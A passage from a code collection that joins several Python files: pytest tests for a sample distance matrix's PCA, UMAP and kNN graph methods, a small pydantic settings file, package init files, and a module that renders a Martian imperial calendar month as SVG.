x_sorted = x[np.argsort(x[:, 5])]
sdm = eda.SampleDistanceMatrix(
x_sorted, sids=sids, fids=fids, use_pdist=False)
# Mismatch labels
with pytest.raises(ValueError) as excinfo:
sdm.pca_feature_gradient_plot(
'5', labels=list('abcdefgh'), selected_labels=[11],
figsize=(10, 10), s=50)
with pytest.raises(ValueError) as excinfo:
sdm.pca_feature_gradient_plot(
'5', labels=list('abcdefgh'), selected_labels=['i'],
figsize=(10, 10), s=50)
# labels not provided
with pytest.raises(ValueError) as excinfo:
sdm.pca_feature_gradient_plot(
'5', selected_labels=[11], figsize=(10, 10), s=50)
def test_sdm_pca_feature_gradient_plot_wrong_args(self):
sids = list(range(8))
fids = [str(i) for i in range(10)]
np.random.seed(123)
x = np.random.ranf(80).reshape(8, -1)
x_sorted = x[np.argsort(x[:, 5])]
sdm = eda.SampleDistanceMatrix(
x, sids=sids, fids=fids, use_pdist=False)
with pytest.raises(ValueError):
sdm.pca_feature_gradient_plot('5', transform=2)
# wrong labels size
with pytest.raises(ValueError):
sdm.pca_feature_gradient_plot('5', figsize=(10, 10),
s=50, labels=[])
with pytest.raises(ValueError):
sdm.pca_feature_gradient_plot('5', figsize=(10, 10),
s=50, labels=[1])
with pytest.raises(ValueError):
sdm.pca_feature_gradient_plot('5', figsize=(10, 10),
s=50, labels=[2])
# wrong gradient length
with pytest.raises(ValueError):
sdm.pca_feature_gradient_plot([0, 1])
with pytest.raises(ValueError):
sdm.pca_feature_gradient_plot(11)
with pytest.raises(ValueError):
sdm.pca_feature_gradient_plot(11)
with pytest.raises(ValueError):
sdm.pca_feature_gradient_plot(-1)
with pytest.raises(ValueError):
sdm.pca_feature_gradient_plot(5)
with pytest.raises(ValueError):
sdm.pca_feature_gradient_plot('123')
@pytest.mark.mpl_image_compare
def test_sdm_pca_plot(self):
sids = list(range(8))
fids = [str(i) for i in range(10)]
np.random.seed(123)
x = np.random.ranf(80).reshape(8, -1)
x_sorted = x[np.argsort(x[:, 5])]
g = x_sorted[:, 5]
sdm = eda.SampleDistanceMatrix(
x_sorted, sids=sids, fids=fids, use_pdist=False)
return sdm.pca_plot(gradient=g, figsize=(10, 10), s=50)
def test_pca_dim(self):
np.random.seed(123)
x5k = np.random.normal(size=5000)
sdm = eda.SampleDistanceMatrix(
x5k.reshape(20, -1), use_pdist=False)
assert sdm._pca_x.shape == (20, 20)
def test_pca_var_explained(self):
np.random.seed(123)
x5k = np.random.normal(size=5000)
sdm = eda.SampleDistanceMatrix(x5k.reshape(20, -1), use_pdist=False)
assert sdm._skd_pca.explained_variance_.shape == (20,)
assert sdm._skd_pca.explained_variance_ratio_.shape == (20,)
@pytest.mark.mpl_image_compare
def test_sdm_nopdist_umap_feature_gradient_plot_npd(self):
sids = list(range(8))
fids = [str(i) for i in range(10)]
np.random.seed(123)
x = np.random.ranf(80).reshape(8, -1)
x_sorted = x[np.argsort(x[:, 5])]
sdm = eda.SampleDistanceMatrix(
x_sorted, sids=sids, fids=fids, use_pdist=False)
fig = sdm.umap_feature_gradient_plot(
'5', figsize=(10, 10), s=50)
np.testing.assert_equal(sdm._x, x_sorted)
np.testing.assert_equal(sdm._sids, sids)
np.testing.assert_equal(sdm._fids, fids)
return fig
@pytest.mark.mpl_image_compare
def test_sdm_nopdist_umap_feature_gradient_plus10_plot_npd(self):
sids = list(range(8))
fids = [str(i) for i in range(10)]
np.random.seed(123)
x = np.random.ranf(80).reshape(8, -1)
x_sorted = x[np.argsort(x[:, 5])]
sdm = eda.SampleDistanceMatrix(
x_sorted, sids=sids, fids=fids, use_pdist=False)
fig = sdm.umap_feature_gradient_plot(
'5', transform=lambda x: x + 10, figsize=(10, 10), s=50)
np.testing.assert_equal(sdm._x, x_sorted)
np.testing.assert_equal(sdm._sids, sids)
np.testing.assert_equal(sdm._fids, fids)
return fig
@pytest.mark.mpl_image_compare
def test_sdm_nopdist_umap_feature_gradient_plot_npd_sslabs(self):
sids = list(range(8))
fids = [str(i) for i in range(10)]
np.random.seed(123)
x = np.random.ranf(80).reshape(8, -1)
x_sorted = x[np.argsort(x[:, 5])]
sdm = eda.SampleDistanceMatrix(
x_sorted, sids=sids, fids=fids, use_pdist=False)
sdm.umap_feature_gradient_plot(
'5', labels=list('abcdefgh'), selected_labels='a',
transform=lambda x: np.log(x+1),
figsize=(10, 10), s=50)
fig = sdm.umap_feature_gradient_plot(
'5', labels=list('abcdefgh'), selected_labels='a',
figsize=(10, 10), s=50)
np.testing.assert_equal(sdm._x, x_sorted)
np.testing.assert_equal(sdm._sids, sids)
np.testing.assert_equal(sdm._fids, fids)
return fig
@pytest.mark.mpl_image_compare
def test_sdm_nopdist_umap_feature_gradient_plot_npd_sslabs_empty(self):
sids = list(range(8))
fids = [str(i) for i in range(10)]
np.random.seed(123)
x = np.random.ranf(80).reshape(8, -1)
x_sorted = x[np.argsort(x[:, 5])]
sdm = eda.SampleDistanceMatrix(
x_sorted, sids=sids, fids=fids, use_pdist=False)
fig = sdm.umap_feature_gradient_plot(
'5', labels=list('abcdefgh'), selected_labels=[],
figsize=(10, 10), s=50)
np.testing.assert_equal(sdm._x, x_sorted)
np.testing.assert_equal(sdm._sids, sids)
np.testing.assert_equal(sdm._fids, fids)
return fig
def test_sdm_umap_feature_gradient_plot_npd_sslabs_wrong_args(self):
sids = list(range(8))
fids = [str(i) for i in range(10)]
np.random.seed(123)
x = np.random.ranf(80).reshape(8, -1)
x_sorted = x[np.argsort(x[:, 5])]
sdm = eda.SampleDistanceMatrix(
x_sorted, sids=sids, fids=fids, use_pdist=False)
# Mismatch labels
with pytest.raises(ValueError) as excinfo:
sdm.umap_feature_gradient_plot(
'5', labels=list('abcdefgh'), selected_labels=[11],
figsize=(10, 10), s=50)
with pytest.raises(ValueError) as excinfo:
sdm.umap_feature_gradient_plot(
'5', labels=list('abcdefgh'), selected_labels=['i'],
figsize=(10, 10), s=50)
# labels not provided
with pytest.raises(ValueError) as excinfo:
sdm.umap_feature_gradient_plot(
'5', selected_labels=[11], figsize=(10, 10), s=50)
def test_sdm_umap_feature_gradient_plot_npd_wrong_args(self):
sids = list(range(8))
fids = [str(i) for i in range(10)]
np.random.seed(123)
x = np.random.ranf(80).reshape(8, -1)
x_sorted = x[np.argsort(x[:, 5])]
sdm = eda.SampleDistanceMatrix(
x, sids=sids, fids=fids, use_pdist=False)
with pytest.raises(ValueError):
sdm.umap_feature_gradient_plot('5', transform=2)
# wrong labels size
with pytest.raises(ValueError):
sdm.umap_feature_gradient_plot('5', figsize=(10, 10),
s=50, labels=[])
with pytest.raises(ValueError):
sdm.umap_feature_gradient_plot('5', figsize=(10, 10),
s=50, labels=[1])
with pytest.raises(ValueError):
sdm.umap_feature_gradient_plot('5', figsize=(10, 10),
s=50, labels=[2])
# wrong gradient length
with pytest.raises(ValueError):
sdm.umap_feature_gradient_plot([0, 1])
with pytest.raises(ValueError):
sdm.umap_feature_gradient_plot(11)
with pytest.raises(ValueError):
sdm.umap_feature_gradient_plot(11)
with pytest.raises(ValueError):
sdm.umap_feature_gradient_plot(-1)
with pytest.raises(ValueError):
sdm.umap_feature_gradient_plot(5)
with pytest.raises(ValueError):
sdm.umap_feature_gradient_plot('123')
@pytest.mark.mpl_image_compare
def test_sdm_nopdist_umap_plot_npd(self):
sids = list(range(8))
fids = [str(i) for i in range(10)]
np.random.seed(123)
x = np.random.ranf(80).reshape(8, -1)
x_sorted = x[np.argsort(x[:, 5])]
g = x_sorted[:, 5]
sdm = eda.SampleDistanceMatrix(
x_sorted, sids=sids, fids=fids, use_pdist=False)
return sdm.umap_plot(gradient=g, figsize=(10, 10), s=50)
def test_umap_dim(self):
np.random.seed(123)
x5k = np.random.normal(size=5000)
sdm = eda.SampleDistanceMatrix(x5k.reshape(20, -1), use_pdist=False)
assert sdm._umap_x.shape == (20, 2)
def test_s_knn_connectivity_matrix(self):
nn_sdm = eda.SampleDistanceMatrix(
[[0], [1], [5]], metric='euclidean', use_pdist=False)
np.testing.assert_allclose(
[[0, 1, 0], [1, 0, 0], [0, 4, 0]],
nn_sdm.s_knn_connectivity_matrix(1).toarray())
assert nn_sdm.s_knn_connectivity_matrix(
1, use_hnsw=False, use_pca=False).shape == (3, 3)
with pytest.raises(ValueError):
assert nn_sdm.s_knn_connectivity_matrix(
1, use_hnsw=False, use_pca=False,
index_params={})
with pytest.raises(ValueError):
assert nn_sdm.s_knn_connectivity_matrix(0)
with pytest.raises(ValueError):
assert nn_sdm.s_knn_connectivity_matrix(
1, use_hnsw=False, use_pca=False,
index_params=None, query_params={}).shape == (3, 3)
assert nn_sdm.s_knn_connectivity_matrix(
1, use_hnsw=True, use_pca=False).shape == (3, 3)
# hnsw can only handle vectors with more than one non-0 elements.
nn_sdm = eda.SampleDistanceMatrix(
[[1, 2, 3], [2, 0, 0], [6, 0, 0]],
metric='cosine', use_pdist=False)
assert nn_sdm.s_knn_connectivity_matrix(
1, use_hnsw=True, use_pca=True).shape == (3, 3)
assert nn_sdm.s_knn_connectivity_matrix(
1, use_hnsw=True, use_pca=False).shape == (3, 3)
assert nn_sdm.s_knn_connectivity_matrix(
1, use_hnsw=False, use_pca=True).shape == (3, 3)
assert nn_sdm.s_knn_connectivity_matrix(
1, use_hnsw=True, use_pca=True, index_params={},
query_params={}, verbose=True).shape == (3, 3)
nn_sdm = eda.SampleDistanceMatrix(
[[1, 2, 3], [2, 0, 0], [6, 0, 0]],
metric='euclidean', use_pdist=False)
assert nn_sdm.s_knn_connectivity_matrix(
1, use_hnsw=True, use_pca=True).shape == (3, 3)
assert nn_sdm.s_knn_connectivity_matrix(
1, use_hnsw=True, use_pca=False).shape == (3, 3)
assert nn_sdm.s_knn_connectivity_matrix(
1, use_hnsw=False, use_pca=True).shape == (3, 3)
assert nn_sdm.s_knn_connectivity_matrix(
1, use_hnsw=True, use_pca=True, index_params={},
query_params={}, verbose=True).shape == (3, 3)
nn_sdm = eda.SampleDistanceMatrix(
[[1, 2, 3], [2, 0, 0], [6, 0, 0]],
metric='euclidean', use_pdist=False)
assert nn_sdm.s_knn_connectivity_matrix(
1, metric='cosine', use_hnsw=True, use_pca=True).shape == (3, 3)
assert nn_sdm.s_knn_connectivity_matrix(
1, use_hnsw=True, use_pca=False).shape == (3, 3)
assert nn_sdm.s_knn_connectivity_matrix(
1, metric='cosine', use_hnsw=False, use_pca=True).shape == (3, 3)
assert nn_sdm.s_knn_connectivity_matrix(
1, metric='cosine', use_hnsw=True, use_pca=True, index_params={},
query_params={}, verbose=True).shape == (3, 3)
with pytest.raises(ValueError):
assert nn_sdm.s_knn_connectivity_matrix(
1, metric='correlation', use_hnsw=True, use_pca=False,
index_params={}, query_params={},
verbose=True).shape == (3, 3)
with pytest.raises(ValueError):
assert nn_sdm.s_knn_connectivity_matrix(
1, metric='correlation', use_hnsw=True, use_pca=True,
index_params={}, query_params={},
verbose=True).shape == (3, 3)
assert nn_sdm.s_knn_connectivity_matrix(
1, metric='cosine', use_hnsw=False, use_pca=True,
verbose=True).shape == (3, 3)
assert nn_sdm.s_knn_connectivity_matrix(
1, metric='cosine', use_hnsw=False, use_pca=False,
verbose=True).shape == (3, 3)
np.random.seed(123)
x5k = spsp.csr_matrix(np.random.normal(size=5000))
nn_sdm = eda.SampleDistanceMatrix(x5k.reshape(1000, 5), use_pdist=False)
index_params = {
"efConstruction": 5,
"M": 5,
"delaunay_type": 2,
"post": 0,
"indexThreadQty": 1
}
query_params = {
"efSearch": 5
}
nn_sdm._s_knns_hnsw(1, metric='cosine',
index_params=index_params,
query_params=query_params)
with pytest.raises(ValueError):
nn_sdm._s_knns_hnsw(
0, use_pca=False, index_params={})
@pytest.mark.mpl_image_compare
def test_s_knn_graph_grad_lab(self):
np.random.seed(123)
x = np.concatenate((np.random.normal(0, 1, 10),
np.random.normal(20, 1, 20))).reshape(30, -1)
sdm = eda.SampleDistanceMatrix(x, metric='euclidean', use_pdist=False)
sdm.s_knn_graph(5, figsize=(5, 5))
assert (5, 1) in sdm._knn_ng_lut
assert len(sdm._knn_ng_lut) == 1
# use cache
sdm.s_knn_graph(5, figsize=(5, 5))
sdm.s_knn_graph(5, figsize=(5, 5), fa2_kwargs={})
sdm.s_knn_graph(5, figsize=(5, 5), nx_draw_kwargs={})
assert len(sdm._knn_ng_lut) == 1
gradient = np.array([1] * 10 + [10] * 20)
labs = gradient = np.array([1] * 10 + [2] * 20)
return sdm.s_knn_graph(5, gradient=gradient, labels=labs,
figsize=(5, 5),
alpha=0.8, random_state=123)
@pytest.mark.mpl_image_compare
def test_s_knn_graph_grad_lab_same_marker(self):
np.random.seed(123)
x = np.concatenate((np.random.normal(0, 1, 10),
np.random.normal(20, 1, 20))).reshape(30, -1)
sdm = eda.SampleDistanceMatrix(x, metric='euclidean', use_pdist=False)
sdm.s_knn_graph(5, figsize=(5, 5))
assert (5, 1) in sdm._knn_ng_lut
assert len(sdm._knn_ng_lut) == 1
gradient = np.array([1] * 10 + [10] * 20)
labs = gradient = np.array([1] * 10 + [2] * 20)
return sdm.s_knn_graph(5, gradient=gradient, labels=labs,
different_label_markers=False,
figsize=(5, 5),
alpha=0.8, random_state=123)
@pytest.mark.mpl_image_compare
def test_s_knn_graph_grad_nolab(self):
np.random.seed(123)
x = np.concatenate((np.random.normal(0, 1, 10),
np.random.normal(20, 1, 20))).reshape(30, -1)
sdm = eda.SampleDistanceMatrix(x, metric='euclidean', use_pdist=False)
sdm.s_knn_graph(5, figsize=(5, 5))
assert (5, 1) in sdm._knn_ng_lut
assert len(sdm._knn_ng_lut) == 1
# use cache
sdm.s_knn_graph(5, figsize=(5, 5))
sdm.s_knn_graph(5, figsize=(5, 5), fa2_kwargs={})
sdm.s_knn_graph(5, figsize=(5, 5), nx_draw_kwargs={})
assert len(sdm._knn_ng_lut) == 1
gradient = np.array([1] * 10 + [10] * 20)
return sdm.s_knn_graph(5, gradient=gradient, figsize=(5, 5),
alpha=0.8, random_state=123)
@pytest.mark.mpl_image_compare
def test_s_knn_graph_nograd_nolab(self):
np.random.seed(123)
x = np.concatenate((np.random.normal(0, 1, 10),
np.random.normal(20, 1, 20))).reshape(30, -1)
sdm = eda.SampleDistanceMatrix(x, metric='euclidean', use_pdist=False)
sdm.s_knn_graph(5, figsize=(5, 5))
assert (5, 1) in sdm._knn_ng_lut
assert len(sdm._knn_ng_lut) == 1
# use cache
sdm.s_knn_graph(5, figsize=(5, 5))
sdm.s_knn_graph(5, figsize=(5, 5), fa2_kwargs={})
sdm.s_knn_graph(5, figsize=(5, 5), nx_draw_kwargs={})
assert len(sdm._knn_ng_lut) == 1
return sdm.s_knn_graph(5, figsize=(5, 5),
alpha=0.8, random_state=123)
@pytest.mark.mpl_image_compare
def test_s_knn_graph_nograd_lab(self):
np.random.seed(123)
x = np.concatenate((np.random.normal(0, 1, 10),
np.random.normal(20, 1, 20))).reshape(30, -1)
sdm = eda.SampleDistanceMatrix(x, metric='euclidean', use_pdist=False)
sdm.s_knn_graph(5, figsize=(5, 5))
assert (5, 1) in sdm._knn_ng_lut
assert len(sdm._knn_ng_lut) == 1
# use cache
sdm.s_knn_graph(5, figsize=(5, 5))
sdm.s_knn_graph(5, figsize=(5, 5), fa2_kwargs={})
sdm.s_knn_graph(5, figsize=(5, 5), nx_draw_kwargs={})
assert len(sdm._knn_ng_lut) == 1
labs = np.array([1] * 10 + [2] * 20)
return sdm.s_knn_graph(5, labels=labs, figsize=(5, 5),
alpha=0.8, random_state=123)
@pytest.mark.mpl_image_compare
def test_s_knn_graph_nograd_lab_same_marker(self):
np.random.seed(123)
x = np.concatenate((np.random.normal(0, 1, 10),
np.random.normal(20, 1, 20))).reshape(30, -1)
sdm = eda.SampleDistanceMatrix(x, metric='euclidean', use_pdist=False)
sdm.s_knn_graph(5, figsize=(5, 5))
assert (5, 1) in sdm._knn_ng_lut
assert len(sdm._knn_ng_lut) == 1
# use cache
sdm.s_knn_graph(5, figsize=(5, 5))
sdm.s_knn_graph(5, figsize=(5, 5), fa2_kwargs={})
sdm.s_knn_graph(5, figsize=(5, 5), nx_draw_kwargs={})
assert len(sdm._knn_ng_lut) == 1
labs = np.array([1] * 10 + [2] * 20)
return sdm.s_knn_graph(5, labels=labs, figsize=(5, 5),
different_label_markers=False,
alpha=0.8, random_state=123)
def test_knn_ind_lut(self):
nn_sdm = eda.SampleDistanceMatrix([[0, 0, 0], [1, 1, 1], [5, 5, 5],
[6, 6, 6], [10, 10, 10],
[20, 20, 20]],
metric='euclidean', use_pdist=False)
assert nn_sdm.s_knn_ind_lut(0) == dict(zip(range(6), [[]]*6))
assert (nn_sdm.s_knn_ind_lut(1) ==
dict(zip(range(6), [[1], [0], [3], [2], [3], [4]])))
assert (nn_sdm.s_knn_ind_lut(2) ==
dict(zip(range(6), [[1, 2], [0, 2], [3, 1],
[2, 4], [3, 2], [4, 3]])))
assert (nn_sdm.s_knn_ind_lut(3) ==
dict(zip(range(6), [[1, 2, 3], [0, 2, 3], [3, 1, 0],
[2, 4, 1], [3, 2, 1], [4, 3, 2]])))
nn_sdm.s_knn_ind_lut(5)
nn_sdm_npd = eda.SampleDistanceMatrix([[x] for x in range(20)],
metric='euclidean',
use_pdist=False)
nn_sdm_pd = eda.SampleDistanceMatrix([[x] for x in range(20)],
metric='euclidean',
use_pdist=False)
assert nn_sdm_npd.s_knn_ind_lut(0) == dict(zip(range(20), [[]]*20))
assert (nn_sdm_npd.s_knn_ind_lut(10) == nn_sdm_pd.s_knn_ind_lut(10))
def test_knn_ind_lut_wrong_args(self):
nn_sdm = eda.SampleDistanceMatrix([[0, 0, 0], [1, 1, 1], [5, 5, 5],
[6, 6, 6], [10, 10, 10],
[20, 20, 20]],
metric='euclidean', use_pdist=False)
with pytest.raises(ValueError) as excinfo:
nn_sdm.s_knn_ind_lut(-1)
with pytest.raises(ValueError) as excinfo:
nn_sdm.s_knn_ind_lut(-0.5)
with pytest.raises(ValueError) as excinfo:
nn_sdm.s_knn_ind_lut(6)
with pytest.raises(ValueError) as excinfo:
nn_sdm.s_knn_ind_lut(6.5)
with pytest.raises(ValueError) as excinfo:
nn_sdm.s_knn_ind_lut(7)
with pytest.raises(ValueError) as excinfo:
nn_sdm.s_knn_ind_lut(7)
| 2.03125 | 2 |
app/settings.py | rglsk/dynamoDB-fastAPI | 3 | 12762197 | from pydantic import BaseSettings
class GlobalConfig(BaseSettings):
DB_HOST: str = "http://dynamodb:8000"
ENVIRONMENT: str = "test"
AWS_REGION: str = "eu-west-1"
config = GlobalConfig()
| 2.046875 | 2 |
videotracker/functions/__init__.py | lysogeny/videotracker | 1 | 12762198 | from .functions import *
from . import abc
from . import params
| 1.273438 | 1 |
web/CalendarImage.py | c4se-jp/martian_imperial_year_table | 0 | 12762199 | """Draw a imdt calendar image."""
from contextlib import contextmanager
from functools import partial
from imperial_calendar import GregorianDateTime, ImperialDateTime, ImperialYearMonth
from imperial_calendar.transform import (
grdt_to_juld,
imdt_to_imsn,
imsn_to_imdt,
imsn_to_mrsd,
juld_to_grdt,
juld_to_tert,
mrsd_to_imsn,
mrsd_to_tert,
tert_to_juld,
tert_to_mrsd,
)
import typing as t
import xml.etree.ElementTree as ET
def next_grdt_day_of(grdt: GregorianDateTime) -> GregorianDateTime:
"""Create a new grdt on the next day."""
grdt = grdt.copy()
days: int = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31][grdt.month - 1]
# NOTE: Don't consider about Julian Calendar, before Gregorian Calendar begins.
if grdt.month == 2 and (
grdt.year % 4 == 0 and (grdt.year % 100 != 0 or grdt.year % 400 == 0)
):
days = 29
if grdt.day == days:
if grdt.month == 12:
grdt.year += 1 # NOTE: Don't consider about B.C. 1, A.D. 1.
grdt.month = 1
else:
grdt.month += 1
grdt.day = 1
else:
grdt.day += 1
return grdt
def grdt_to_imdt(
grdt: GregorianDateTime, imdt_timezone: t.Optional[str]
) -> ImperialDateTime:
"""Transform grdt to imdt."""
imdt_timezone = imdt_timezone or "+00:00"
juld = grdt_to_juld(grdt.to_utc_naive())
tert = juld_to_tert(juld)
mrsd = tert_to_mrsd(tert)
imsn = mrsd_to_imsn(mrsd)
return ImperialDateTime.from_standard_naive(imsn_to_imdt(imsn), imdt_timezone)
def imdt_to_grdt(imdt: ImperialDateTime, grdt_timezone: str) -> GregorianDateTime:
"""Transform imdt to grdt."""
imsn = imdt_to_imsn(imdt.to_standard_naive())
mrsd = imsn_to_mrsd(imsn)
tert = mrsd_to_tert(mrsd)
juld = tert_to_juld(tert)
return GregorianDateTime.from_utc_naive(juld_to_grdt(juld), grdt_timezone)
@contextmanager
def e(
tag: str, attrib: t.Dict[str, str] = {}, text: str = "", parent: ET.Element = None
) -> t.Generator[t.Callable[[str, t.Dict[str, str], str], t.Any], None, t.Any]:
"""Create a XML element and pass a new context for sub elements."""
if parent is not None:
element = ET.SubElement(parent, tag, attrib)
else:
element = ET.Element(tag, attrib)
if text != "":
element.text = text
yield partial(e, parent=element)
def text_y(y: t.Union[float, str], font_size: t.Union[float, str]) -> float:
"""
Caliculate the y value of the SVG text element.
y: mm
font_size: pt
"""
return float(y) + float(font_size) * 0.353
class CalendarImage(object):
"""Draw a imdt calendar image."""
BLACK: str = "#000000" # "#3b3b3b"
BLUE: str = "#008dcc" # "#40a1cc"
FONT_FAMILY_BOLD: str = """fot-tsukubrdgothic-std, "FOT-TsukuBRdGothic Std B", "FOT-筑紫B丸ゴシック Std B", TsukuBRdGothic-Bold, "筑紫B丸ゴシック ボールド", sans-serif""" # noqa: E501
FONT_FAMILY_REGULAR: str = """fot-tsukubrdgothic-std, "FOT-TsukuBRdGothic Std B", "FOT-筑紫B丸ゴシック Std B", TsukuBRdGothic-Bold, "筑紫B丸ゴシック ボールド", sans-serif""" # noqa: E501
FONT_SIZE_ANNOTATION: float = 8.0
FONT_SIZE_BOLD_LARGE: float = 32.0
FONT_SIZE_LARGE: float = 20.0
FONT_SIZE_SMALL: float = 10.0
GRAY_BLUE: str = "#6bb4d6" # "#a5c7d6"
GRAY_RED: str = "#ff9d80" # "#ffb7a1"
GRAY: str = "#888888" # "#999999"
HEIGHT_DAYS_GAP: float = 4.5
HEIGHT_GRDT_BELT: float = 5.5
HEIGHT_TOP_SPACE: float = 15.0
RED: str = "#e03f0c" # "#e07553"
SIZE_DAY_SQUARE: float = 22.5
STROKE_WIDTH_BOLD: str = "0.4mm"
STROKE_WIDTH_THIN: str = "0.15mm"
WHITE: str = "#ffffff" # "#ffffff"
WIDTH_LEFT_SPACE: float = 45.0
grdt_timezone: str
imdt: ImperialDateTime
def __init__(self, imdt: ImperialDateTime, grdt_timezone: str):
"""Init."""
self.grdt_timezone = grdt_timezone
self.imdt = imdt.copy()
self.imdt.day = 1
self.imdt.hour = 0
self.imdt.minute = 0
self.imdt.second = 0
def draw_as_svg(self) -> str:
"""Draw a imdt calendar image as SVG string."""
svg = ET.Element(
"svg",
{
"height": "148mm",
"style": f"""
background-color: {CalendarImage.WHITE};
""".strip(),
"width": "210mm",
"xmlns": "http://www.w3.org/2000/svg",
},
)
with e("title", {}, f"帝國火星曆{self.imdt.year}年{self.imdt.month}月", parent=svg):
pass
with e(
"g",
{"font-family": CalendarImage.FONT_FAMILY_REGULAR},
parent=svg,
) as _e:
self.__draw_title(_e)
self.__draw_joubi(_e)
self.__draw_static_frame(_e)
self.__draw_imdt_days(_e)
self.__draw_imdt_syukuzitu(_e)
self.__draw_grdt_days(_e)
# return ET.tostring(svg, encoding="utf-8", xml_declaration=True)
return ET.tostring(svg, encoding="utf-8")
def __draw_grdt_day(self, _e, grdt: GregorianDateTime) -> None:
imdt = grdt_to_imdt(grdt, self.imdt.timezone)
line_x = (
(((imdt.hour * 60) + imdt.minute) * 60 + imdt.second)
/ (24 * 60 * 60)
* CalendarImage.SIZE_DAY_SQUARE
)
if imdt.month == self.imdt.month:
x1 = (
CalendarImage.WIDTH_LEFT_SPACE
+ line_x
+ CalendarImage.SIZE_DAY_SQUARE * ((imdt.day - 1) % 7)
)
x2 = (
CalendarImage.WIDTH_LEFT_SPACE
+ line_x
+ CalendarImage.SIZE_DAY_SQUARE * ((imdt.day - 1) % 7)
)
y1 = (
CalendarImage.HEIGHT_TOP_SPACE
+ CalendarImage.SIZE_DAY_SQUARE
+ (
CalendarImage.HEIGHT_GRDT_BELT
+ CalendarImage.HEIGHT_DAYS_GAP
+ CalendarImage.SIZE_DAY_SQUARE
)
* ((imdt.day - 1) // 7)
)
y2 = (
CalendarImage.HEIGHT_TOP_SPACE
+ CalendarImage.SIZE_DAY_SQUARE
+ CalendarImage.HEIGHT_GRDT_BELT
+ (
CalendarImage.HEIGHT_GRDT_BELT
+ CalendarImage.HEIGHT_DAYS_GAP
+ CalendarImage.SIZE_DAY_SQUARE
)
* ((imdt.day - 1) // 7)
)
with _e(
"line",
{
"stroke": CalendarImage.BLACK,
"stroke-width": CalendarImage.STROKE_WIDTH_THIN,
"x1": f"{x1}mm",
"x2": f"{x2}mm",
"y1": f"{y1}mm",
"y2": f"{y2}mm",
},
):
pass
next_grdt_day = next_grdt_day_of(grdt)
next_grdt_day_imdt = grdt_to_imdt(next_grdt_day, self.imdt.timezone)
next_line_x = (
(
((next_grdt_day_imdt.hour * 60) + next_grdt_day_imdt.minute) * 60
+ next_grdt_day_imdt.second
)
/ (24 * 60 * 60)
* CalendarImage.SIZE_DAY_SQUARE
)
is_drawable_on_beginning_of_month = (
next_line_x
> 0.353 * CalendarImage.FONT_SIZE_SMALL * (len("10/10") * 0.6) + 1.5
)
if grdt.is_holiday or grdt.weekday == 7:
color = CalendarImage.GRAY_RED
elif grdt.weekday == 6:
color = CalendarImage.GRAY_BLUE
else:
color = CalendarImage.GRAY
if imdt.month == self.imdt.month:
text = (
f"{grdt.month}/{grdt.day}"
if grdt.day == 1
or (imdt.day == 1 and not is_drawable_on_beginning_of_month)
else str(grdt.day)
)
is_drawable_on_weekend = (
CalendarImage.SIZE_DAY_SQUARE - line_x
) > 0.353 * CalendarImage.FONT_SIZE_SMALL * (len(text) * 0.6) + 1.5
if (
imdt.day == ImperialYearMonth(self.imdt.year, self.imdt.month).days()
and not is_drawable_on_weekend
):
pass
elif imdt.day % 7 == 0 and not is_drawable_on_weekend:
self.__draw_text(
_e,
{
"fill": color,
"font-size": CalendarImage.FONT_SIZE_SMALL,
"x": f"{CalendarImage.WIDTH_LEFT_SPACE + 1}mm",
"y": CalendarImage.HEIGHT_TOP_SPACE
+ CalendarImage.SIZE_DAY_SQUARE
+ 0.5
+ (
CalendarImage.HEIGHT_GRDT_BELT
+ CalendarImage.HEIGHT_DAYS_GAP
+ CalendarImage.SIZE_DAY_SQUARE
)
* (imdt.day // 7),
},
text,
)
else:
x = (
CalendarImage.WIDTH_LEFT_SPACE
+ line_x
+ 1
+ CalendarImage.SIZE_DAY_SQUARE * ((imdt.day - 1) % 7)
)
self.__draw_text(
_e,
{
"fill": color,
"font-size": CalendarImage.FONT_SIZE_SMALL,
"x": f"{x}mm",
"y": CalendarImage.HEIGHT_TOP_SPACE
+ CalendarImage.SIZE_DAY_SQUARE
+ 0.5
+ (
CalendarImage.HEIGHT_GRDT_BELT
+ CalendarImage.HEIGHT_DAYS_GAP
+ CalendarImage.SIZE_DAY_SQUARE
)
* ((imdt.day - 1) // 7),
},
text,
)
else:
if is_drawable_on_beginning_of_month:
self.__draw_text(
_e,
{
"fill": color,
"font-size": CalendarImage.FONT_SIZE_SMALL,
"x": f"{CalendarImage.WIDTH_LEFT_SPACE + 1}mm",
"y": CalendarImage.HEIGHT_TOP_SPACE
+ CalendarImage.SIZE_DAY_SQUARE
+ 0.5,
},
f"{grdt.month}/{grdt.day}",
)
def __draw_grdt_days(self, _e) -> None:
drawing_grdt_day = imdt_to_grdt(self.imdt, self.grdt_timezone)
drawing_grdt_day.hour = 0
drawing_grdt_day.minute = 0
drawing_grdt_day.second = 0
while (
grdt_to_imdt(drawing_grdt_day, self.imdt.timezone)
< self.__next_imdt_month()
):
self.__draw_grdt_day(_e, drawing_grdt_day)
drawing_grdt_day = next_grdt_day_of(drawing_grdt_day)
def __draw_imdt_days(self, _e) -> None:
for day in range(
1, ImperialYearMonth(self.imdt.year, self.imdt.month).days() + 1
):
imdt = self.imdt.copy()
imdt.day = day
if imdt.holiday is not None or day % 7 == 1:
color = CalendarImage.RED
elif day % 7 == 0:
color = CalendarImage.BLUE
else:
color = CalendarImage.BLACK
x = (
CalendarImage.WIDTH_LEFT_SPACE
+ 1
+ CalendarImage.SIZE_DAY_SQUARE * ((day - 1) % 7)
)
y = (
CalendarImage.HEIGHT_TOP_SPACE
+ 1
+ (
CalendarImage.SIZE_DAY_SQUARE
+ CalendarImage.HEIGHT_GRDT_BELT
+ CalendarImage.HEIGHT_DAYS_GAP
)
* ((day - 1) // 7)
)
self.__draw_text(
_e,
{
"fill": color,
"font-size": CalendarImage.FONT_SIZE_SMALL,
"x": f"{x}mm",
"y": y,
},
str(day),
)
if imdt.holiday is not None:
day_width = (
CalendarImage.FONT_SIZE_SMALL * (0.353 - 0.06) * len(str(day))
)
self.__draw_text(
_e,
{
"fill": color,
"font-size": CalendarImage.FONT_SIZE_ANNOTATION,
"style": f"""
inline-size: {CalendarImage.SIZE_DAY_SQUARE - day_width - 1}mm;
""".strip(),
"x": f"{x + day_width}mm",
"y": y + 0.2,
},
str("・".join(imdt.holiday.names)),
)
# with _e(
# "foreignObject",
# {
# "height": f"{CalendarImage.SIZE_DAY_SQUARE}mm",
# "requiredExtensions": "http://www.w3.org/1999/xhtml",
# "width": f"{CalendarImage.SIZE_DAY_SQUARE - day_width - 1}mm",
# "x": f"{x + day_width}mm",
# "y": f"{y + 0.2}mm",
# },
# ) as _e1:
# with _e1(
# "div",
# {
